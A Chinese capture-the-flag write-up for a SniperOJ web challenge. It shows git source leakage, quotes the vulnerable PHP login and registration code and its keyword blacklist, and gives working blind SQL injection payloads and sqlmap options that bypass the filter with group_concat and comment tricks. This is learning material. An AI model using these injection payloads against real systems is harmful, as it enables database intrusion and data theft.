[SniperOJ](web)图书管理系统 注入 源码泄露

0x00 题目概况

题目地址:http://www.sniperoj.cn:10000/

这是一道注入题,存在git源码泄露,使用githack(freebuf有工具介绍)把源码脱下来,进行审计,然后注入。

挺简单的一道题,我自己卡一个地方卡了好久就是。

拖下来源码放在我服务器上,懒得拖想看看可以下载:

120.27.32.227/sniper.rar


大概分析如下:

敏感词过滤

$blacklist = array(" select "," union ","limit", " from ", "and","sleep");

foreach ($_POST as $key => $value) {

for ($i= 0;$i< count($blacklist); $i++){

if(strpos(strtolower($value), $blacklist[$i]) != false){

die("Come on inject me, you stupid srcipt kid!");

}


在注册页面:

// 判断用户是否存在

$sql_check = "SELECT userID from users where username = '$username'";

$result = $conn->query($sql_check);

if ($result->num_rows > 0) {

die("{\"status\":\"0\",\"msg\":\"用户名已存在\"}");

}

很明显的盲注点,在登录界面也有一个盲注点。(没发现哪里可以明注,本人新手还望赐教)


0x01 自己解题历程

1. 那个黑名单,“select”"union“” 可以使用内联注释绕过,或者使用其他如 /**/ 代替空格即可,and 可以用 && 代替,limit 没有找到方法绕过

2. 注入点  ,username 可以为:

' or 1 #

在 1 处进行盲注。

为真的关键词是 “用户名已存在”。

一看这么简单,加上最近深入了解了一下slqmap,所以想下直接用sqlmap跑就行。

sqlmap参数:  --string "用户名已存在" --suffix "#" --prefix " 'or " -v 3 --risk 3 --tamper space2comment.py 

确实可以跑出来,但是,只能跑出数据库名,表名要靠碰撞,其他获取不到,很是困惑。

纠结了好一会,查看slqmap的payload才想起是 "limit" 在黑名单里面。

接下来就是怎么绕过limit限制的问题了。大体上思路有两种。

1. 不用limit ,寻找可以代替limit的关键字

2. 绕过限制,如编码绕过,内联注释绕过

找了挺久的资料,一无所获。没有找到mysql没有能代替limit的关键字,这里也绕过不了。

在网上看到一种这种绕过,在关键字中添加 注释   “/**/” ,如:sele/***/ct  。这是一种错误的方式,除非php会对  “/**/”进行过滤,否则,这种语句带入到数据库进行查询会报错的。


0x02 正确的思路:group_concat

大概自己思维还是太狭隘,一直在纠结怎么绕过limit ,想着盲注一定要有limit。

把源码挂在屏幕半天,偶然看自己的一下笔记才想起来使用 “group_concat”

个人对group_concat通俗理解:

进行查询,将多条查询结果以一行显示出来,即一条

如:select group_concat(username) from users

会将所有的username显示在一行

想到这,就没必要用limit 了。接下来就是写脚本的问题。

payload 如下:

获取表名:

' or ascii(substr(((select/**/group_concat(table_name)/**/from/**/information_schema.tables where table_schema=database()))from/**/1 for 1))=93 #

获取列名:

' or ascii(substr(((select/**/group_concat(column_name)/**/from/**/information_schema.columns where table_name=0x7573657273))from/**/2 for 1))=71 #

获取具体数据:

' or ascii(substr(((select/**/group_concat(username)/**/from/**/users))/**/from 2 for 1))=21 #


0x03 总结

git泄露

盲注不一定要使用 limit 

记住 group_concat

使用sqlmap行不通时查看payload,别太依赖工具

题目挺简单的,自己太菜了,还要多学多看,这些远远不够

2017 6 13 早上

昨天服务器有些问题,是本地搭建环境测试的,现在好了,实测有些问题。

在判断 布尔真值为1的语句中:

if "用户名已存在" in response.text:

这个句子 的中文是gb2312编码,处理会有问题。

懒得查找如何解决编码问题,那最最简单的判断就是使用len根据 response.text 的长度进行判断。

为真长度为29

为假长度为31


最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • SQLMap用户手册【超详细】
    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,433评论 2 22
  • sqlmap手册
    sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,114评论 0 5
  • Sql注入
    Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 713评论 0 3
  • 手工+sqlmap的POST注入
    手工: 第一种 1.判断输入框是否存在注入 直接输入一个 '看是否报错(如果存在盲注的话也是不会报错的),如果直接...
    查无此人asdasd阅读 11,541评论 0 6
  • MySql手动注入
    information_schema SQL基础 1.1 什么是sql? SQL(structured query...
    崔渣渣阅读 989评论 0 0